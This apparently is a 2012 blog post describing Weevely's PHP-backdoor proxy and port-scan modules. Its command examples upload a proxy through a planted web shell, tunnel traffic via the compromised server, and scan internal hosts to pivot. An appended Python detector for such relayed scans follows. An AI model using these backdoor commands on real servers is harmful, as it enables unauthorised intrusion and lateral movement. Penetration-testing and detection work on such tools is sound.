Weevely as HTTP proxy and port scanner
2012-05-11 19:20:40 » hacking, networking, pentesting, php, pivoting, portscan, proxy, security, Weevely
I've added to Weevely some interesting modules to interact with remote networks.
The proxy module runs a local HTTP proxy that tunnels your traffic through the target web server. By default, it spawns the proxy locally on port 8080. By setting
http://localhost:8080 as the proxy in your favourite browser, you anonymize your traffic and can eventually pivot toward private networks accessible from the web server.
    user@local$ ./weevely.py http://www.target.com/weev.php password :net.proxy

    Weevely 0.6 - Generate and manage stealth PHP backdoors
    Emilio Pinna 2011-2012

    [net.proxy] PHP proxy uploaded as 'http://www.target.com/weepro.php'
    [net.proxy] Next times skip install running ':net.proxy rurl=http://www.target.com/weepro.php'
    [net.proxy] Proxy running. Set 'http://127.0.0.1:8080' as HTTP proxy
Run :show net.proxy to show all configurable options.
The scan module performs a simple port scan through the remote web server. The host entry supports different formats: a single host (e.g. www.google.it), a single IP (e.g. 126.96.36.199), an IP range (e.g. 188.8.131.52-184.108.40.206), a network (e.g. 220.127.116.11/24), or an interface (e.g. eth3). Ports support a single port (e.g. 80) or multiple ones (e.g.
This function is really useful for scanning internal networks and eventually connecting to them using net.proxy as a pivot.
    user@local$ ./weevely.py http://www.target.com/weev.php password :net.scan eth9 80

    Weevely 0.6 - Generate and manage stealth PHP backdoors
    Emilio Pinna 2011-2012

    [net.scan] Scanning 1 ports of 256 hosts using 26 requests (10 connections per request)
    ..........
    OPEN: 18.104.22.168:80
    ..........
    ..........
    ..........
    ..........
    ..........
    ..........
    OPEN: 22.214.171.124:80
    ..........
Run :show net.scan to show all configurable options. To get information about remote network interfaces and their network addresses, use the new module
These modules are available in the Weevely git repository and in version 0.7.
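From the defender's side, a scan relayed through a web server as described above shows up as that server suddenly opening connections to many internal addresses on one port. The following added example (not part of Weevely or the original post) flags that fan-out in flow records; the log format, server address, window and threshold are assumptions, and the sample records are constructed.

```python
import ipaddress
from collections import defaultdict, deque
from datetime import datetime, timedelta

WEB_SERVERS = {"10.0.0.5"}       # assumption: hosts that normally only answer requests
WINDOW = timedelta(seconds=60)   # assumption: sliding window length
THRESHOLD = 20                   # assumption: distinct internal targets per window


def parse_flow(line):
    """Parse 'ISO-time src dst dport' (hypothetical flow-log format)."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, ipaddress.ip_address(dst), int(dport)


def detect_fanout(lines, servers=WEB_SERVERS, window=WINDOW, threshold=THRESHOLD):
    """Return one alert (src, dport, distinct_dsts, window_start) per server/port
    that reaches `threshold` distinct private destinations inside `window`."""
    recent = defaultdict(deque)  # (src, dport) -> deque of (ts, dst)
    alerted, alerts = set(), []
    for ts, src, dst, dport in sorted(map(parse_flow, lines), key=lambda f: f[0]):
        if src not in servers or not dst.is_private:
            continue             # only outbound-to-internal flows from web servers
        q = recent[(src, dport)]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:
            q.popleft()          # drop flows that fell out of the window
        distinct = {d for _, d in q}
        if len(distinct) >= threshold and (src, dport) not in alerted:
            alerted.add((src, dport))
            alerts.append((src, dport, len(distinct), q[0][0]))
    return alerts


def sample_flows():
    """Constructed records: routine DB traffic, then a 256-host sweep on port 80."""
    t0 = datetime(2012, 5, 11, 19, 0, 0)
    rows = [f"{(t0 + timedelta(seconds=i)).isoformat()} 10.0.0.5 10.0.0.20 3306"
            for i in range(30)]
    rows += [f"{(t0 + timedelta(seconds=40, milliseconds=100 * i)).isoformat()} "
             f"10.0.0.5 10.0.1.{i} 80" for i in range(256)]
    return rows


if __name__ == "__main__":
    for alert in detect_fanout(sample_flows()):
        print("possible scan relayed through web server:", alert)
```

Repeated connections to a single backend (the database flows in the sample) never trip the rule, because it counts distinct destinations rather than connection volume.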